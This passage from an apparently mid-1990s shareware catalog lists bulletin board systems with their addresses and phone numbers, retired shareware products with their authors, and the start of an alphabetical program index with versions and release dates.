Southwest BBS + Address: PO Box 70062, Pasadena CA 91117-7062 + BBS Phone: 818-285-8684 + + Appendix C, "Bulletin Boards" 722 + + + + Space BBS + Address: PO BOX X, MENLO PARK CA 94026 + BBS Phone: 415-323-4398 + + Squirrel's Nest + Address: 1250 E Bluff St, Marseilles IL 61341 + BBS Phone: 815-795-6371 + + SSB-BBS + Address: PO Box 2153, Pampa TX 79066-2153 + BBS Phone: 806-669-6936 + + St Louis Users Group BBS + Address: 12365 Maverick Drive Apt F, Maryland Heights MO 63043 + BBS Phone: 314-878-7614 + + Stargate Online + Address: Rue de Agace 30A, Maisieres 7020 BELGIUM + BBS Phone: 32 065 334 518 + + Starlight + Address: PO Box 9723, Colorado Springs CO 80932 + BBS Phone: 719-633-2991 + + Stick N Rudder BBS + Address: 40 Marnel Court, Severna Park MD 21146-2922 + BBS Phone: 410-431-7130 + + Stimpy's Sandbox + Address: 613 Herman Ave, Lemoyne PA 17043 + BBS Phone: 717-730-8504 + + Stingray, Stingray II + Address: 534 W Cromwell Ave, Clovis CA 93611 + BBS Phone: 209-434-4215 + + STSI + Address: PO Box 297, Bertha MN 56437 + BBS Phone: 218-924-2060 + + Substation BBS + Address: 1717 Avenida Del Sol, Boca Raton FL 33432 + BBS Phone: 407-477-5756 + + Sunset Ridge BBS + th + Address: 9320 S 54 Court, Oak Lawn IL 60453 + BBS Phone: 708-636-0971 + + Superior Shareware + Address: PO Box 26005, Thunder Bay ON P7E 2M0 CANADA + BBS Phone: 807-475-3099 + + Appendix C, "Bulletin Boards" 723 + + + + Support U. + Address: 135 West Adams, Suite G9, St Louis MO 63122 + BBS Phone: 314-984-8387 + + SYNAPSE BBS + Address: 22 Beloeil, Gatineau QB J8T 7G3 CANADA + BBS Phone: 819-561-4321 + + T.I.F.S.D.B. China-Link + Address: 636 Coral Reef Drive, Galthersburg MD 20878 + BBS Phone: 301-975-9794 USA + + TechNet BBS + Address: Dynamic Learning Systems, PO BOX 805, MARLBORO MA + 01752 + BBS Phone: 508-366-7683 + + Ten Forward + Address: PO Box 813, Port Angeles WA 98362 + BBS Phone: 206-452-7681 + + Texstar BBS + Address: 1111 South Main Street Suite A, Duncanville TX 75137 + BBS Phone: 214-298-0273 + + The 8-Bit Corner + Address: 1297 Lakeshore Drive, Muskegon MI 49441 + BBS Phone: 616-755-3013 + + The Albuquerque ROS + Address: PO Box 13150, Albuquerque NM 87192-3150 + BBS Phone: 505-296-3000 + + The Atomic Cafe BBS + Address: PO Box 720894, Houston TX 77072 + BBS Phone: 713-530-8875 + + The Bare Bony Facts BBS + Address: Route 1 Box 141, Dike TX 75417 + BBS Phone: 903-945-2062 + + The Baud Room BBS + Address: PO BOX 254, Clifton Hill VIC 3068 AUSTRALIA + BBS Phone: 61-3-94818022 + + The Big Byte + Address: 609 Rogers St., Rockwell NC 28138 + BBS Phone: 704-279-2295 + + The BixBox + Address: PO BOX 75, Chatham KENT ME5 9DL ENGLAND + BBS Phone: 44 0 1634-200931 + + Appendix C, "Bulletin Boards" 724 + + + + The Black Cauldron + Address: 704 Highgate Dr, Winter Springs FL 32708 + BBS Phone: 407-699-6613 + + The Black Gold BBS + st + Address: 6927 E 71 Street, Tulsa OK 74133 + BBS Phone: 918-272-7779 + + The Blue Ridge Express + Address: PO BOX 34446, Richmond VA 23234 + BBS Phone: 804-790-1675 + + THE BOARD + Address: 2828 Cochran St #271, Simi Valley CA 93065 + BBS Phone: 818-366-8874 + + The Bobcat BBS System + Address: 100 Anthony Road #05-100, Cairnhill Garden, Singapore + 0922 SINGAPORE + BBS Phone: 65-738-2509 + + THE BOSS + Address: 5 Forest Road, Tenafly NJ 07670-2209 + BBS Phone: 201-568-7293 + + The Colorado Connection + Address: 6700 Van Gordon St, Arvada CO 80001 + BBS Phone: 303-423-9775 + + The Computer Matrix + Address: PO BOX 3150, Springfield MO 65808 + BBS Phone: 417-862-8910 + + The Consultant BBS + Address: PO Box 8571, New York NY 10116-4655 + BBS Phone: 718-837-3236 + + The Cygnus X-I Opus BBS + Address: 12 Homesdale Ave, Southington CT 06489 + BBS Phone: 860-620-0757 + + The Dart Board + Address: 17921 Co Rd 25, Dolores CO 81323 + BBS Phone: 970-882-2360 + + The Darton Connection + Address: 2400 Gillionville Rd, Albany GA 31707 + BBS Phone: 912-430-3007 + + The Dew Drop Inn + Address: 3567 MOUNTAIN VIEW DR #222, WEST MIFFLIN PA 15122 + BBS Phone: 412-854-0619 + + Appendix C, "Bulletin Boards" 725 + + + + The Electronic Oracle + Address: 12 Brentwood Road, Flinders Park 5025 S.AUSTRALIA + BBS Phone: 61 8 234 1150 + + The Evans BBS + Address: 302 East Coffren Ave, Greenville MI 48838 + BBS Phone: 616-754-6180 + + The FABulous BBS + Address: 851 State Road 434 E Ste 106, Longwood FL 32750-5364 + BBS Phone: 407-834-6466 + + The File Bank + Address: PO BOX 2828, Fallbrook CA 92088 + BBS Phone: 619-728-4318 + + THE FILE BANK, INC. + Address: 540 Acoma Street, Denver CO 80204 + BBS Phone: 303-534-4646 + + The Firebox Express + Address: 2120 Keystone, Sterling Heights MI 48310 + BBS Phone: 810-826-9411 + + The French Connexion + Address: 3017 St. Clair Ave #264, Burlington ON L7N 3P5 CANADA + BBS Phone: 905-632-5653 + + The G-Net BBS + Address: 610 Elm Street, Struthers OH 44471 + BBS Phone: 216-755-0843 + + The Garbage Dump + Address: PO BOX 16032, Albuquerque NM 87191-6032 + BBS Phone: 505-294-5675 + + The Golden*Dane BBS + Address: 633 Franklin Ave Suite 128, NUTLEY NJ 07110 + BBS Phone: 201-338-5265 + + The Grinder + Address: 195-114 Tierra Rejada Rd, Simi Valley CA 93065 + BBS Phone: 805-527-4053 + + The HighLander BBS + Address: PO Box 2152, Stow OH 44224 + BBS Phone: 216-678-2277 + + The Hole in the Wall + Address: 6325 N Ponderosa Way, Parker CO 80134-5615 + BBS Phone: 303-841-5515 + + Appendix C, "Bulletin Boards" 726 + + + + The INDEX System (tm) + Address: 6030 E Alabama Ste 114, Woodstock GA 30188 + BBS Phone: 770-924-8472 + + The Invention Factory + Address: 321 Greenwich Street, New York NY 10013-3340 + BBS Phone: 212-274-8110 + + The Kandy Shack + Address: 12531 Strathmore Dr, Garden Grove CA 92640-5502 + BBS Phone: 714-636-2667 + + The Ledge PCBoard + Address: 6858 Acco Street, Los Angeles CA 90040 + BBS Phone: 818-896-4015 + + The Liberty BBS + Address: Suite 102, 446 S Anaheim Hills Rd, Amaheim Hills CA + 92807 + BBS Phone: 714-996-7777 + + The LINK BBS + Address: 2975 Wilshire Blvd # 600, Los Angeles CA 90010 + BBS Phone: 310-459-1264 + + The LitterBox (R) + Address: 415 S Potomac St # 2, Waynesboro PA 17268 + BBS Phone: 717-765-8995 + + The Locker Room + Address: 1541 Commerce St, Corona CA 91720-1730 + BBS Phone: 909-270-5278 + + The Mail Room BBS + Address: 3007 George St, Anderson IN 46016-5448 + BBS Phone: 317-644-5029 + + The Mars Station + Address: PO Box 878, Yermo CA 92398 + BBS Phone: 619-254-3012 + + The Menagerie BBS + Address: 209 W Pearl Street, Willard OH 44890 + BBS Phone: 419-935-0245 + + The Miami PC Users Group + th + Address: 10448 SW 49 Place, Cooper City FL 33328 + BBS Phone: 305-680-9481 + + The Mind's Eye + th + Address: 1540 19 Street SW, Hickory NC 28602 + BBS Phone: 704-322-1681 + + Appendix C, "Bulletin Boards" 727 + + + + The MOG-UR'S EMS + Address: 11846 Balboa Blvd #293, Granada Hills CA 91344 + BBS Phone: 818-366-1238 + + The Motherboard III + Address: Accudrive, 903-I Loop 336 West, Conroe TX 77301 + BBS Phone: 409-441-2939 + + The National Cheese Emporium + Address: 1105 Creswood Rd, Philadelphia PA 19115-3003 + BBS Phone: 215-673-0261 + + The Omega Line + Address: 416 W St John, Olney IL 62450 + BBS Phone: 618-392-4607 + + The Out-Post RBBS + Address: PO Box 1568, OZARK AL 36361-1568 + BBS Phone: 334-774-6989 + + The Philosopher's Stone + Address: PO Box 496, Ft Dick CA 95538 + BBS Phone: 707-465-0925 + + The Pier Exchange + Address: 346 Bedford Avenue, Buffalo NY 14216-3135 + BBS Phone: 716-875-3130 + + The Point BBS + Address: 122 Cedar Street W, Stevens Point WI 54481-6401 + BBS Phone: 715-345-1327 + + The Privy Ledged BBS + Address: 5572 West Joaquin Street, Kearns UT 84118-7212 + BBS Phone: 801-966-6270 + + The Racers Net + Address: PO Box 251, Tahoe Vista CA 96148-0251 + BBS Phone: 916-546-2095 + + The Radio Wave PCBoard BBS + Address: PO Box 1026, Delran NJ 08075 + BBS Phone: 609-764-0812 + + The Registry BBS + Address: 3131 Mountain Creek Rd Apt 7A7, Chattanooga TN 37415 + BBS Phone: 423-870-0794 + + The Resting Place BBS + Address: PO Box 323, Sandwich IL 60548-0323 + BBS Phone: 815-786-6240 + + Appendix C, "Bulletin Boards" 728 + + + + The Richmond Connection BBS + Address: PO Box 70241, Richmond VA 23255 + BBS Phone: 804-740-1364 + + The RoadHouse BBS + Address: 4095-B Creek Way, Indianapolis IN 46227-4036 + BBS Phone: 317-784-2147 + + The Rock Garden + Address: PO Box 33455, Phoenix AZ 85067-3455 + BBS Phone: 602-222-3000 + + The Sandbox + Address: PO Box 30902, Midwest City OK 73140 + BBS Phone: 405-737-9540 + + The Shack BBS + Address: 43 Hillview Road, Findon Valley, Worthing WEST SUSSEX + BN14 OBX U.K. + BBS Phone: 441 903-268668 + + The Shareware Support BBS + Address: 23A High Street, Tring HERTS HP23 6AF U.K. + BBS Phone: 44 442 891109 + + the small circle bbs + Address: PO Box 287, SUNSET LA 70584 + BBS Phone: 318-662-3328 + + The Sounds of Silence + Address: 2401 Lebanon Road # 5, Nashville TN 37214-2412 + BBS Phone: 615-449-5969 + + The Storm Front BBS + Address: PO Box 144, Croydon PA 19021-5055 + BBS Phone: 215-788-4662 + + The Tech Resource + Address: 5109 N Magnolia, Orange TX 77632 + BBS Phone: 409-745-5247 + + The Transporter Room + Address: 1018 Glenfiddich Drive, Charlotte NC 28215 + BBS Phone: 704-567-9513 + + The Twilight Zone + Address: 1119 E. Main Street, Auburndale WI 54412 + BBS Phone: 715-652-2758 + + The Wild Onion! + Address: 118 S York Ste 204, Elmhurst IL 60126 + BBS Phone: 708-993-0461 + + Appendix C, "Bulletin Boards" 729 + + + + The Windmill Company BBS + Address: PO Box 1529, Lubbock TX 79408 + BBS Phone: 806-792-6116 + + the Wizard's Gate BBS + Address: 463 East Town Street, Columbus OH 43215-4796 + BBS Phone: 614-224-1635 + + Thundervolts BBS + Address: 1175 Montecito Drive, Los Angeles CA 90031-1651 + BBS Phone: 213-225-5474 + + Tim Eo/Timbbs + Address: 275 Dorin Court Road, Fort Lee NJ 07024 + BBS Phone: 201-224-2688 + + TNT Online + Address: 1524 Jackson St, Ft Myers FL 33901 + BBS Phone: 941-337-5999 + + Toledo's TBBS + Address: 4440 Samaria Road, Temperance MI 48182 + BBS Phone: 313-854-6001 + + Top City OnLine + Address: 2402 Brenner Court, Roseville MN 55113 + BBS Phone: 612-633-0100 + + Totoche BBS + Address: 6305 Beaucourt, Montreal-Nord QC H1G 2G3 CANADA + BBS Phone: 514-326-8363 + + Trade Link + Address: Haller Str. 15, 74532 Ilshofen GERMANY + BBS Phone: 49-7904 1599 + + Trader's Connection + Address: PO Box 19817, Indianapolis IN 46219-0817 + BBS Phone: 800-386-8266 + + Trading Post BBS + Address: 39 Oval Grange, Wooler Road, Hartlepool TS26 8LT + ENGLAND + BBS Phone: +44-01429-891453 + + Trails West BBS + rd + Address: 408 3 Ave, Wainwright AB T9W 1A1 CANADA + BBS Phone: 403-842-6655 + + Tranquility Base BBS + Address: PO Box 19483, OKLAHOMA CITY OK 73144-0483 + BBS Phone: 405-682-2352 + + Appendix C, "Bulletin Boards" 730 + + + + TTPBBS + Address: Lions Buildings Market Place, Uttoxeter STAFFS ST14 + 8HP ENGLAND + BBS Phone: 44-1889 568625 + + U.T. Dallas Undergraduate + Address: Univ of Texas at Dallas, PO Box 830688 M/S J03.2, + Richardson TX 75083-0688 + BBS Phone: 214-883-2168 + + V-I-S-I-O-N + Address: PO BOX 290, W FRIENDSHIP MD 21794 + BBS Phone: 410-461-8082 + + Vision Quest + Address: 1780 W Sherman Blvd, Muskegon MI 49441 + BBS Phone: 616-725-8566 + + VisionBytes! + Address: 210 Summerford Circle, San Ramon CA 94583-4400 + BBS Phone: 510-355-0968 + + Visus BBS + Address: Av.Marques de Tomar 71 A, Lisboa 1000 PORTUGAL + BBS Phone: 3511796 5839 + + VOS! OnLine Services + Address: 21-710 Coronation Ave, Ottawa ON K1G 4G7 CANADA + BBS Phone: 613-823-3142 + + Way Out Wild! + Address: 24 VijayVilla Bld, 79 Worli Seaface, Bombay + Maharashtra 400025 INDIA + BBS Phone: 91-22-496-1609 + + Wesley's Window + Address: 220 Orange Church Road, Canton GA 30114 + BBS Phone: 404-522-9042 + + Why Not BBS + Address: PO BOX 20643, Long Beach CA 90801-0643 + BBS Phone: 310-436-1311 PUB + + Windchimes BBS + Address: PO Box 2100, Jupiter FL 33468 + BBS Phone: 407-223-8918 + + Wolverine BBS + Address: 1148 Oakdale Circle West, Freeland MI 48623 + + World Data Network,Inc + Address: 11088 Thrush Ridge Road, Reston VA 22091-4722 + BBS Phone: 703-620-8900 + + Appendix C, "Bulletin Boards" 731 + + + + WorldLink BBS-Derby + Address: 1 Sedgebrook Close, Oakwood DERBY DE21 2DX U.K. + BBS Phone: 44 332-830362 + + Xanadu BBS + Address: 862 Old Plainville Rd Unit #29, New Bedford MA 02745 + BBS Phone: 508-995-9876 + + Xevious BBS + Address: 585 Edmands Road, Framingham MA 01701-3088 + BBS Phone: 508-788-6951 + + YA! WEBECAD! + rd + Address: 908 3 Terrace N, Barling AR 72923 + BBS Phone: 501-452-3733 + + YAHou BBS + Address: 7914 West Dodge Rd # 353, Omaha NE 68114 + BBS Phone: 402-455-7901 + + Yutron Tech (Hong Kong) Lmtd + Address: Suite 1605, Tower A New Trade, Plaza, 6, On Ping + Street, Shatin, N. T. Hong Kong + BBS Phone: 8522 6868 169 + + Ziff-Davis Interactive + Address: 25 First St, Cambridge MA 02141 + + Appendix D, "Retired shareware" 732 + + + + + + Appendix D + Retired shareware + + This appendix lists shareware products now "retired" by the + author. Retired products no longer receive the minimum levels + of support, and the authors have agreed to return any registra- + tion fees sent in for the software. + + An author may retire a shareware product for any number of + reasons. Some applications have outlived their usefulness; + others may have grown too costly to continue supporting due to + competition from other authors. + + + Product: Astro-World for Windows + Author: Marcus Fabian + Astrology Program incl. printed evaluations. + + + Product: Astro-World fuer Windows + Author: Marcus Fabian + Astrologieprogramm (deutsch) fu"r Windows. + + + Product: Autospell for Online Service + Author: CompuBridge + Spell checker for online service. + + + Product: Bible IQ Challenge + Author: R.K. West Consulting + Bible trivia game for 1-4 players. + + + Product: Book of Changes + Author: R.K. West Consulting + I CHING fortunes and philosophy. + + + Product: BTS-Equalizer + Author: Nine-Patch Software + Tutor and study aid, question file exchange. + + + Product: ClipBook + Author: Software Co-op + Windows graphics image cataloger w/clipart. + + + Product: DayCare + Author: Software Co-op + Complete daycare recordkeeping system. + + Appendix D, "Retired shareware" 733 + + + + Product: Dinger + Author: Pinecliffe International - ASG + Superceded by WOPR 2.0, for WinWord 2.0. + + + Product: Enveloper + Author: Pinecliffe International - ASG + Superceded by WOPR 2.0, for WinWord 2.x. + + + Product: FlowDraw Plus + Diagramming program with mouse interface. + + + Product: FOURU + Author: GTX Software + Four handy utilities. + + + Product: General Purpose System Analyzer + Author: COBOL Maintenance Technologies + COBOL system analysis and documentation. + + + Product: GS TROOP TRACKER + Author: Robert Barrentine Consulting + Girl Scout troop records system with reports. + + + Product: Halloween Match + Author: Glen DeBiasa + Eat all your candy corn by matching tiles. + + + Product: I.Q. Challenge + Author: R.K. West Consulting + Test knowledge in 5 categories, earn diploma. + + + Product: ImageCommander + Author: JASC, Inc. + Image file management for Windows. + + + Product: Maillist / M-Label + Author: R.K. West Consulting + Easy mailing list system for home or business. + + + Product: MegaCad + Author: Midnight Software, Inc. + CAD program. + + Appendix D, "Retired shareware" 734 + + + + Product: MERIT BADGE TRACKER + Author: Robert Barrentine Consulting + Council/district system for MB counselors. + + + Product: MYMIQ + Author: Gateway Software + Managing Your Money import stock quotes. + + + Product: OMNIDiZk + Author: Unicorn Software Limited + DiZk cataloging and labeling system. + + + Product: ORGANIZE! Your Legal Case Notes + Author: HomeCraft Software + Cataloging system for statutes and case notes. + + + Product: An Ounce Of Prevention + Author: Pete Maclean + Disaster prevention/data protection system. + + + Product: PACK TRACKER + Author: Robert Barrentine Consulting + Cub Scout pack automated records system. + + + Product: PARTY TRACKER + Author: Robert Barrentine Consulting + Political organization membership system. + + + Product: PC Bartender + Author: HomeCraft Software + Recipes for drinks, featuring no-alchol drink. + + + Product: Penname + Author: R.K. West Consulting + Helps writers come up with names. + + + Product: PixFolio Image Catalog System + Author: ACK Software + Windows Image Cataloging System. + + + Product: PrinterBUDDY + Author: Lenard Dean + A setup utility for all printers. + + Appendix D, "Retired shareware" 735 + + + + Product: PRO$TOCK + Author: Gateway Software + Downloads stock quotes & news from Prodigy. + + + Product: PROMASTER + Author: Gateway Software + Adds power to Prodigy software. + + + Product: Pulsar for DOS + Author: Tesserax Information Systems + LaserJet printer utility for DOS. + + + Product: QMU + Author: Gateway Software + Prodigy/Quicken link. + + + Product: SCBABOTL + Author: Raymond A.J. Pesek + Fire dept. SCBA bottle & PASS management. + + + Product: Stardial + Author: GTX Software + Autodialer For Galaxy/Starlink service. + + + Product: TRAINING TRACKER + Author: Robert Barrentine Consulting + Council/district training administrator. + + + Product: TROOP TRACKER + Author: Robert Barrentine Consulting + Scout Troop records system with reports. + + + Product: Your Financial Advisor + Author: HomeCraft Software + Loan and finacial calculations. + + + Product: Your Menu + Author: HomeCraft Software + Hard disk menu and DOS shell. + + Appendix E, "Sorted list of all programs" 736 + + + + + + Appendix E + Sorted list of all programs + + This appendix notes the author of each program listed in this + catalog. It comes in extremely handy when you want to see if a + given program comes from an ASP member, or when you want to + know the current version number/release date for a program. + Hint: look in the index for the program (by name) if you want + to see a full description for the program or learn the author's + address & phone number. You'll find page references for all + the information you need. + + st + 1 &goal Fantasy Football 3.07 (01-31-94) McS Custom Software + 2col 9.5 (12-21-95) ARCaine Technology + 2DO Personal Task Manager 1.2 (06-01-94) William Anderson + Consulting + 3.5" Disk Label Creator for Wor 2.0 (06-01-96) AMF + 4DOS 5.0 (11-23-93) JP Software Inc. + 4DOS for Windows NT 2.0 (01-24-94) JP Software Inc. + 4FILES 3.23 (08-25-95) Hand-Crafted Software + 4OS2 2.0 (12-16-93) JP Software Inc. + th + 6 Sense - DOS 6 Utilities 2.21 (03-21-95) Tay-Jee Software + Corporation + A86 Macro Assembler 3.22 (01-20-90) Eric Isaacson Software + AA-Array.DLL 1.0 (01-01-95) AA-Software International + AAVBSORT.DLL 1.0 (01-01-95) AA-Software International + ABcmd 1.0 (03-15-94) Abri Technologies, Inc. + ABmenu 1.6 (10-22-92) Abri Technologies, Inc. + Above & Beyond 3.1 (06-09-94) 1Soft Corp. + ACTION Process Automator 1.05 (08-25-95) Redei Enterprises + AdMaker 3.5 (05-06-94) OsoSoft + AGA (Orifice meters) 4.0 (06-01-96) NorDecor + Ahelp Clipper Help Library 1.44 (01-01-96) MicroFox Company + Alad_IRQ 1.0 (12-27-93) Computer Telecommunication Systems, + Inc. + Alarm VBX 1.3 (08-14-94) Mabry Software + AlbumMaster 8.50 (09-01-94) Unicorn Software Limited + AlbumMaster For Windows 2.10 (09-01-94) Unicorn Software + Limited + ALITE 1.20r (07-08-93) TRIUS, Inc. + ALL-PRO League Scheduler 1.1 (01-17-95) ALL-PRO Software Inc. + AMF Daily Planner & P.I.M. 6.0 (06-01-96) AMF + AMF Intelligent Organ for Win 2 (06-01-96) AMF + AMF Multimedia Jukebox (WIN) 2.0 (06-01-96) AMF + Amortz - Loan Schedules & More! 1.60 (10-31-94) Mountain View + Software + Ample Notice 3.00 (07-12-93) Granny's Old-Fashioned Software + ANARCHY 2.0 (02-05-96) Cascoly Software + Ancient Yacht 2.1 (11-01-95) LatticeWork Software + Ancient Yacht 2.0 (10-29-95) LatticeWork Software + + Appendix E, "Sorted list of all programs" 737 + + + + Anim. Multiplication & Division 3.0 (05-12-94) FLIX + Productions + Animated Alphabet 1.0 (04-12-90) FLIX Productions + Animated Bugs 1.0 (09-07-94) FLIX Productions + Animated Clock 3.0 (05-12-94) FLIX Productions + Animated Math 1.0 (02-15-91) FLIX Productions + Animated Memory Game 3.0 (05-12-94) FLIX Productions + Animated Money 1.0 (05-12-94) FLIX Productions + Animated Shapes 1.0 (09-25-90) FLIX Productions + Animated VGA Memory Game 1.0 (05-12-94) FLIX Productions + Animated Words 3.0 (05-12-94) FLIX Productions + ANNUITY ACE 1.03 (12-20-95) Insight Software Solutions, Inc. + AntiC 1.14 (09-01-92) Cascoly Software + APT Mailing Assistant 5.30 (01-15-95) APT Computer Solutions, + Inc. + APT Mailing Assistant (OS/2) 1.10 (01-15-95) APT Computer + Solutions, Inc. + ARCHIVE TRACKER 1.0 (12-20-93) Robert Barrentine Consulting + Around The House 2.02 (06-26-94) RMH Computer Services + ARROW TRACKER 2.0 (05-31-94) Robert Barrentine Consulting + Artillery Screen Saver 1.2 (11-11-95) Tay-Jee Software + Corporation + ARTSAVER Nature Screen Saver 1.04 (05-09-96) Scidel + Technologies Inc. + AS-EASY-AS 5.50e (10-29-93) TRIUS, Inc. + AsciiConvert 1.30 (12-20-95) Informatik Inc. + ASP List of Approved BBSs n/a (01-01-80) Association of + Shareware Professionals + ASP List of Approved Vendors n/a (01-01-80) Association of + Shareware Professionals + ASP Vendor Member Application n/a (06-10-92) Association of + Shareware Professionals + Assistant For Windows 1.0 (11-14-95) Thomas Koch + ASTRO 2.86 (11-19-94) Christopher J. Noyes Software + ASTRO For Windows 1.08 (11-19-94) Christopher J. Noyes + Software + ATC: Air Traffic Controller 1.0 (09-29-85) Cascoly Software + ATTRB 1.6 (10-22-92) Abri Technologies, Inc. + Back Soon! 2.2 (03-21-95) Tay-Jee Software Corporation + Backer 2.99 (03-24-96) Cordes Development + Backup 1.4 (05-21-94) Burnham Park Software, Inc. + Backup Fugue 1.1 r3 (12-12-95) Fugue Software + BarCod VBX 1.3 (08-14-94) Mabry Software + BASASM.LIB 1.0 (06-22-92) Annette Cuomo + Baseball Hotline Information 2.0 (01-09-96) DynoTech Software + Basic Training 1.01 (10-07-92) Cascoly Software + Basketball Statistics 1.0 (11-05-94) Gentle Productions + BassMap 1.3 (09-01-94) Arcanum Computing + A Batch View 1.1 (09-30-93) Robin R. Latham + BATTLE CHARGE 1.04 (10-07-95) Cold Water Software + BATUTIL 4.0 (12-23-91) CTRLALT Associates + BBS Access Communications 2.25 (01-01-96) MicroFox Company + Beam Cookbook 1.00 (10-01-94) SoftEngineering + Bible Timeline 2.14 (03-01-93) Cascoly Software + + Appendix E, "Sorted list of all programs" 738 + + + + Bible Timeline for Windows 1.10 (08-10-95) Cascoly Software + BIBLOGIC 3.02 (12-19-93) Biblogic Computer Services + Bike 4.05 (04-26-96) Henning Associates + Bingo Text Editor 4.00a (10-26-94) Sunderland Software + Bird's-Eye-View 1.0 (08-15-95) Toham Soft + BirthdayMinder 1.0 (03-21-96) Saturday*s Child + BitMapZ For Windows 2.40 (11-01-95) Unicorn Software Limited + BLANK-IT 5.1b (10-11-92) Rhode Island Soft Systems, Inc. + BLANK-IT API Specifications 5.1b (10-29-92) Rhode Island Soft + Systems, Inc. + BmpLst VBX 1.8 (08-14-94) Mabry Software + Book Librarian 1.53 (12-26-93) TurboSystemsCo + Book-It 1.1b (01-17-96) Instinctive Systems Ltd + Bookbild/DOS Pamphlet Publisher 1.1 (02-01-95) Science + Translations Software Services + Bookbild/Win Pamphlet Publisher 1.1 (02-01-95) Science + Translations Software Services + BOOKLET 4.5 (10-02-94) Sympathetic Software + BOOT.SYS 2.10 (10-26-94) Salvisberg Software & Consulting + Bootit 1.02 (09-03-95) TeraByte Unlimited + Border 1.1 (02-23-89) Cascoly Software + Bottom Line Accounting 2.5E (02-04-94) WindSoft International, + Inc. + BOXER/DOS Text Editor 7.0b (05-01-96) Boxer Software + BOXER/OS2 Text Editor 7.0b (05-01-96) Boxer Software + BOXES 6.0 (01-09-96) DynoTech Software + BOXES II 1.1 (01-09-96) DynoTech Software + BOXES III 1.0 (06-01-96) DynoTech Software + Bridge Assistant 3.1 (01-01-96) SoftTech + Brother's Keeper 5.1 (02-01-93) John Steed + Bubble Chart 2.0 (06-15-95) Informatik Inc. + BUDDY: A Tutorial Companion 1.2 (08-05-92) Chatfield Software, + Inc. + Builder 2.2 (10-27-94) Aeolus Software + Business Cards for Word 2.0 (06-01-96) AMF + Business Clock Link 1.00 (12-06-94) BizMark Development + BusinessCards for Windows v2.01 (05-10-94) Michael Dvorkin + Button Manager for Windows 1.3b (01-10-95) AKC Applied + Knowledge Corporation + By the Numbers 5.4a (07-28-95) R.K. West Consulting + BYWHEN v1.11 (01-19-96) W.S.B. Communications + c-scope 1.11 (10-31-93) JAYAR Systems + Calculation Solitaire 1.12 (12-23-91) Daniel Thomas + CALC_JNC 9.51 (02-20-93) James N. Cox + Calendar Quick 3.10 (02-10-96) Logic Pulse + THE CALLING TREE 1.7a (08-31-94) IN/QUEST, LLC + Canfield for Windows 1.01 (01-04-92) Daniel Thomas + Capbuf 1.41 (12-28-90) Cascoly Software + Capital Gainz 4.1 (02-16-96) AlleyCat Software, Inc. + Capital Gainz for Windows 5.1 (01-01-96) AlleyCat Software, + Inc. + Car Restoration Diary 2.31 (01-27-94) RMH Computer Services + Card Flash 1.0 (11-21-94) Burnham Park Software, Inc. + Cards+More 2.4 (12-01-95) Informatik Inc. + + Appendix E, "Sorted list of all programs" 739 + + + + CassetteMaster 9.10 (09-01-94) Unicorn Software Limited + CassetteMaster For Windows 2.10 (09-01-94) Unicorn Software + Limited + CATALOG-ON-A-DISK 4.00 (05-01-94) EmmaSoft Software Company, + Inc. + CD Player for Word 95 (06-01-96) AMF + CD Wizzard CD Player for Win 4.03 (05-09-96) BFM Software + CD-QUICK Cache 1.20 (06-12-95) Circuit Systems + CDMaster 8.60 (09-01-94) Unicorn Software Limited + CDMaster For Windows 3.10 (01-29-95) Unicorn Software Limited + Cellar Master for Windows 1.0 r1 (02-22-96) Fugue Software + Chores & Rewards 1.00 (01-01-95) K. Jeff Hayes + CHRONOS 2.18 (01-10-93) Cascoly Software + CHRONOS:Windows in Time 1.10 (09-01-95) Cascoly Software + Cipher 2.2 (09-01-94) Arcanum Computing + Cipher for Windows 1.1 (09-01-94) Arcanum Computing + Citizen 4.0 (05-13-95) R.K. West Consulting + CJNFonts 1.00 (11-19-94) Christopher J. Noyes Software + Classic Phantoms Screen Saver 1.10 (11-01-95) Tay-Jee Software + Corporation + Cliche Finder 2.0 (05-10-95) R.K. West Consulting + Clickometer 1.1 (11-29-94) Sapphire Software Inc. + ClipMate for Windows 3.13 (09-01-95) Thornton Software + Solutions + clySmic Icon Bar 2.21 (01-04-96) clySmic Software + clySmic Lunar Almanack 2.22 (11-30-95) clySmic Software + clySmic Win32 Utilities 2.00 (11-15-95) clySmic Software + CMFiler 5.37d (07-15-95) NoVaSoft + CODE-A-LINE 1.0 (03-22-94) Optimax Corporation + CodePrint for C/C++ 2.02 (01-01-96) Geist Microsystems + COLOR CROSS 1.05 (10-07-95) Cold Water Software + Color Fun 1.0 (05-06-94) Burnham Park Software, Inc. + Colored Toolbar Icons for Word 7.0 (06-01-96) AMF + ComeBack 3.0 (01-06-94) MicroTools Inc + CommEx 1.27 (04-03-96) Cottonwood Software + Computer Dictionary for Windows 2.00 (12-01-95) Gary + FitzGerald + Computer System Manager 1.41 (02-19-94) RMH Computer Services + Computerized Christmas Cards 1.3 (10-01-95) Impact D. + Publishing + Computerized Valentine Cards 1.1 (10-01-95) Impact D. + Publishing + Congressional Hotline Info 2.0 (01-09-96) DynoTech Software + Contact Browser 2.5b (08-25-95) Moore Software Solutions + Contact-Lens! 2.3 (04-15-94) Kruse Control Software + Content Label Rating 1.0 (10-08-94) R.K. West Consulting + CONTRACT BRIDGE 2.4 (01-17-96) Robert Lindsay Wells + Convert It!(tm) SE 3.0b (03-17-95) SMI Corporation + CrabWise 1.0 (01-01-94) Shawn Anderson SoftWare + Creativity Package 4.01 (01-04-96) R.K. West Consulting + CRISP-R REAL ESTATE ACCOUNTING 2.10 (07-01-95) JAMES W. + FUNSTEN SOFTWARE + Crossdown for Windows 2.2 (11-14-95) Crossdown + Crossword Clipper for DOS 2.00 (04-15-94) PC HELP-LINE + + Appendix E, "Sorted list of all programs" 740 + + + + Crossword Clipper for Windows 2.00 (04-15-94) PC HELP-LINE + Crossword Construction Kit 2.0 (12-20-95) Insight Software + Solutions, Inc. + Crossword Creator 6.00 (04-15-94) PC HELP-LINE + CrossWords 2.01 (08-03-95) Glen DeBiasa + Crowndale Tales : ESCAPE! 1.0 (08-17-95) Crowndale Productions + Crush v1.3 (11-05-94) PocketWare + Cryptik 1.4 (10-02-93) Cascoly Software + Crypto! 2.0 (03-01-94) KMR Consulting + Crystal Ball 4.0 (05-12-95) R.K. West Consulting + CSDIFF 1.40 (01-25-96) C.Sitte Softwaretechnik + CTS Serial Port Utilities 1.2 (12-06-93) Computer + Telecommunication Systems, Inc. + CULTURAL AWARENESS 1.13 (05-04-94) Awareness Productions + Curses! 3.1 (05-17-95) R.K. West Consulting + CUSTOM SCREEN SAVER (WINDOWS) 1.0 (01-15-94) Accidental + Software + DaMenu 2.01 (06-04-94) Just-In-Time Computing Services + DARN! Don't Forget! 4.00 